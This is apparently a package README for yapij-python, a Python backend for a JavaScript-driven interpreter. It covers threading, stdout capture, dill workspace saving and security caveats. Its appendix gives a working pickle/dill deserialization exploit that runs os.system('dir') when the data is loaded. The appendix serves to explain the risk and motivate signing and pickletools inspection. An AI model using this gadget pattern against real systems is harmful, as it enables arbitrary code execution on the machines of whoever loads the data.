
Python-side of YAPIJ js-to-python interpreter.

Project description

yapij-python: Python-side of yapij package.

Implementation Details

There are two key challenges that one faces when implementing an interpreter emulator:

  1. Catching and processing program output.
  2. Interrupting code before it is completed.

At the same time, we'd also like:

  1. The ability to send other commands to the python process while code is running (for example, to save a workspace).
  2. The ability to check on the health of the process with a heartbeat.

The main ingredients of the solution are:

  1. Multi-threading for a main interface, the interpreter, and a heartbeat.
  2. asyncio scheduling off the main loop.
  3. Context managers that overwrite sys.stdout and sys.stderr with an emulator. Appropriate placement of the context managers is key!
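
As a rough illustration of the threading ingredient, here is a minimal sketch (not the actual yapij code) with one thread acting as a heartbeat and another executing submitted source. The names heartbeat, interpreter, commands and beats are hypothetical and chosen only for this example.

```python
import queue
import threading
import time

def heartbeat(beats, stop, interval=0.05):
    # Hypothetical heartbeat: record a timestamp until asked to stop.
    while not stop.is_set():
        beats.append(time.monotonic())
        stop.wait(interval)

def interpreter(commands, results):
    # Hypothetical interpreter loop: execute source strings until None arrives.
    namespace = {}
    while True:
        source = commands.get()
        if source is None:
            break
        exec(source, namespace)
        results.append(namespace.get("x"))

beats, results = [], []
stop = threading.Event()
commands = queue.Queue()

hb = threading.Thread(target=heartbeat, args=(beats, stop), daemon=True)
worker = threading.Thread(target=interpreter, args=(commands, results), daemon=True)
hb.start()
worker.start()

# The main thread is not blocked by the running code, so it could
# accept further commands here while the worker is busy.
commands.put("import time; time.sleep(0.2); x = 1 + 1")
commands.put(None)
worker.join()
stop.set()
hb.join()
```

Because the submitted code runs on the worker thread, the heartbeat keeps ticking while it sleeps.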

Misc. Details

Placement of context managers

A context manager that is called within a thread will "bubble up" to parent threads so long as it is running. See the appendix example. (However, there is no "bubbling down" from parent to child threads.)

This is problematic in our context because the threads will run as long as the context. (Therefore, Thread.join is not an option.)

Therefore, we place catch_output - the main context manager that formats print statements, exceptions, and sys.stdout in general - in the child thread ExecSession. This thread executes commands sent to the editor.

All such similar statements in the main thread are also handled by catch_output due to the "bubbling up" behavior.

Rejected Alternatives

  • Use standard exec and runpy to execute input:
    • The built-in module code provides InteractiveInterpreter and InteractiveConsole classes for doing just this.
    • Running code on instances of these objects still blocks, so it does nothing for the KeyboardInterrupt problem.
    • It also does nothing for printing the value of the last line.
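
To make the "last line print" point concrete: assuming it refers to echoing the value of a trailing expression the way a REPL does, plain exec discards that value. The sketch below shows one possible way to recover it with the ast module. The helper run_and_echo is hypothetical and is not necessarily how yapij handles this.

```python
import ast

def run_and_echo(source, namespace):
    """Execute source and return the value of a trailing expression, if any."""
    tree = ast.parse(source, mode="exec")
    last_value = None
    if tree.body and isinstance(tree.body[-1], ast.Expr):
        # Split off the final expression so it can be evaluated separately.
        last = ast.Expression(body=tree.body.pop().value)
        exec(compile(tree, "<input>", "exec"), namespace)
        last_value = eval(compile(last, "<input>", "eval"), namespace)
    else:
        exec(compile(tree, "<input>", "exec"), namespace)
    return last_value

ns = {}
exec("a = 2\na * 21", ns)  # plain exec: the value of the last line is lost
value = run_and_echo("a = 2\na * 21", ns)
```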

Known Issues and Limitations



  • The session interpreter runs on its own thread. Therefore, certain applications may not run as expected.
  • For example, the signal module cannot install signal handlers from a non-main thread.
  • Consider flipping this around so that the "main" thread is ExecSession.

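
The signal limitation is easy to reproduce outside of yapij. In this small sketch, a hypothetical helper install_handler tries to register a SIGINT handler from a worker thread, and Python raises ValueError:

```python
import signal
import threading

errors = []

def install_handler():
    try:
        # Registering a handler is only allowed from the main thread.
        signal.signal(signal.SIGINT, signal.default_int_handler)
    except ValueError as exc:
        errors.append(exc)

t = threading.Thread(target=install_handler)
t.start()
t.join()
```

Code sent to the session interpreter that relies on signal handlers would hit the same error.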
sys.stdout and sys.stderr

  • In order to communicate with the node process, sys.stdout and sys.stderr are overridden with an instance of a custom class ZMQIOWrapper.
  • The custom class is built to emulate the classes underlying sys.stdout. In particular, it inherits class io.TextIOWrapper.
  • However, full equivalence is not guaranteed at this time.
  • Moreover, attempts to re-route sys.stdout from within the interpreter may not work as expected or may fail to revert as expected.
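
To give a feel for the idea, here is a simplified sketch of a stream emulator. It is not ZMQIOWrapper itself: the class ForwardingStream and the helper redirect_both are hypothetical, the class derives from io.TextIOBase rather than io.TextIOWrapper, and it forwards to a plain callback instead of a ZMQ socket.

```python
import contextlib
import io
import sys

class ForwardingStream(io.TextIOBase):
    """Hypothetical stand-in for ZMQIOWrapper: forwards writes to a callback."""

    def __init__(self, send, name):
        super().__init__()
        self._send = send
        self._name = name

    def writable(self):
        return True

    def write(self, text):
        # A real implementation would send this over a socket instead.
        self._send({"stream": self._name, "text": text})
        return len(text)

@contextlib.contextmanager
def redirect_both(send):
    old_out, old_err = sys.stdout, sys.stderr
    sys.stdout = ForwardingStream(send, "stdout")
    sys.stderr = ForwardingStream(send, "stderr")
    try:
        yield
    finally:
        # Always restore the original streams, even after an exception.
        sys.stdout, sys.stderr = old_out, old_err

messages = []
with redirect_both(messages.append):
    print("hello")
    print("oops", file=sys.stderr)
```

Code that keeps its own reference to the original sys.stdout, or that swaps sys.stdout again inside the block, bypasses this kind of wrapper, which is one reason re-routing from within the interpreter can misbehave.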


The point of this module is to permit arbitrary code execution. It is by no means secure.

Workspace Manager

  • The workspace manager currently saves objects using the dill module, which is based on pickle.
  • We use dill because it allows us to preserve the state of a huge range of objects.
  • The problem is that, if it is possible to pickle anything, then it will also be possible to pickle malicious code.
  • The current approach is to add a key to each file following the approach outlined here.
    • This will raise a flag and fail to load if the generated key does not match the data.
    • It cannot protect in cases where someone malicious correctly decodes then re-encodes a file (or puts malicious code in the file to start).
    • Thus, this is best thought of as a way of being protected from code that might be naively injected into the pickled workspace when it is transferred between two known users (i.e. via a poorly-executed man-in-the-middle attack.)
  • Further refinements might include using pickletools.dis to inspect files for red flags. (See the example code for what that spits out.)
    • This will still never be completely secure.
  • Jupyter Notebook stores keys in a separate db.
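
The keyed-file idea can be sketched as follows, assuming an HMAC-style signature prepended to the serialized bytes. The exact scheme yapij uses is not shown here, so dump_signed, load_signed and the key value are hypothetical, and pickle stands in for dill to keep the example standard-library only.

```python
import hashlib
import hmac
import pickle

DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes

def dump_signed(obj, key):
    # Prepend a keyed digest of the payload to the payload itself.
    payload = pickle.dumps(obj)
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return tag + payload

def load_signed(blob, key):
    tag, payload = blob[:DIGEST_SIZE], blob[DIGEST_SIZE:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch: refusing to unpickle")
    return pickle.loads(payload)

key = b"shared-secret"  # hypothetical key known to both users
blob = dump_signed({"x": 1}, key)
restored = load_signed(blob, key)

# Flipping a single bit of the payload makes verification fail.
tampered = blob[:-1] + bytes([blob[-1] ^ 1])
```

As noted above, this only detects modification by someone who does not hold the key. Anyone with the key can sign a malicious payload.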

A "Safe Mode"?

  • It is really hard to do anything like a sandbox for python.
  • In Python 2.3 rexec was disabled due to "various known and not readily fixable security holes."
  • Therefore, we take the stance that - instead of trying to offer security some of the time - we will always allow arbitrary execution in the hopes that this keeps users vigilant.

Security Best Practices

Best practices for yapij are identical to best practices for running any python code:

  • Never load a workspace from someone that you do not know and trust.
  • Never install a python package that you do not know or trust.


  • Packaging is carried out with PyPRI.
  • A new version is compiled by a job (using .gitlab-ci.yaml) every time a new commit is pushed with a version. (I think it depends on a tag being added.)
  • Go to CLI to see the jobs.
  • Use pipreqs yapij to make requirements.txt


The main non-standard dependencies are:

  • pyzmq/zmq: "ØMQ is a lightweight and fast messaging implementation."
  • msgpack_python/msgpack: "MessagePack is an efficient binary serialization format. It lets you exchange data among multiple languages like JSON. But it's faster and smaller."
  • dill: "dill extends python’s pickle module for serializing and de-serializing python objects to the majority of the built-in python types."

We also provide custom serialization for NumPy arrays and Pandas dataframes. Thus, these become dependencies as well.



Michael Wooley



(Sorry, not my choice.)


A dill Exploit

Drawn from Kevin London's Dangerous Python Functions, Part 2

import os
import dill
import pickletools

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Note: this will only list files in your directory.
        # It is a proof of concept.
        return (os.system, ('dir',))

def serialize_exploit():
    shellcode = dill.dumps({'e': Exploit(), 's': dill.dumps})
    return shellcode

def insecure_deserialize(exploit_code):
    # Loading the data calls os.system('dir') as a side effect.
    return dill.loads(exploit_code)

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print('~'*80,'IF I CAN SEE YOUR FILES I CAN USUALLY DELETE THEM AS WELL', '~'*80, sep='\n')
    insecure_deserialize(shellcode)

    print('~'*80,'WHAT IF WE MADE USE OF SHELL CODE TO LOOK FOR RED FLAGS LIKE "REDUCE"?', '~'*80, sep='\n')
    # Disassemble the pickle stream without executing it.
    pickletools.dis(shellcode)
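
A programmatic version of the "red flag" check might look like the sketch below. It walks the opcode stream with pickletools.genops without executing it. The helper red_flags and the choice of suspicious opcodes are assumptions made for illustration, pickle stands in for dill, and the harmless Exploit here calls print instead of os.system.

```python
import pickle
import pickletools

# Opcodes that import a callable or call one during unpickling.
SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE"}

def red_flags(data):
    """Return the suspicious opcode names found in a pickle byte string."""
    found = {op.name for op, arg, pos in pickletools.genops(data)}
    return sorted(found & SUSPICIOUS)

class Exploit:
    def __reduce__(self):
        # Harmless stand-in: unpickling would call print("side effect").
        return (print, ("side effect",))

safe = red_flags(pickle.dumps({"a": [1, 2, 3]}))
risky = red_flags(pickle.dumps(Exploit()))
```

Many legitimate objects also use these opcodes (any class instance does), so a scan like this can only raise a flag for review. It cannot prove that a file is safe.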

Context managers in a thread

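import builtins
import contextlib
import threading
import time

# Original
print_original = builtins.print

def print_modified(*objects, sep=' ', end='\n', file=None, flush=True):
    return print_original('[Context]', *objects, sep=sep, end=end, file=file, flush=flush)

@contextlib.contextmanager
def catch_output():
    # builtins.print is shared by every thread in the process.
    builtins.print = print_modified
    try:
        yield
    finally:
        builtins.print = print_original

class WorkerThread(threading.Thread):

    def run(self):
        with catch_output():
            time.sleep(0.5)  # keep the context open while the main thread prints
            print('Inside Context')
        print('Outside Context')

w = WorkerThread()
w.start()
time.sleep(0.1)  # let the worker enter the context first
print('Yep')  # printed from the main thread, but still prefixed
w.join()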

Running this prints something like:

[Context] Yep
[Context] Inside Context
Outside Context
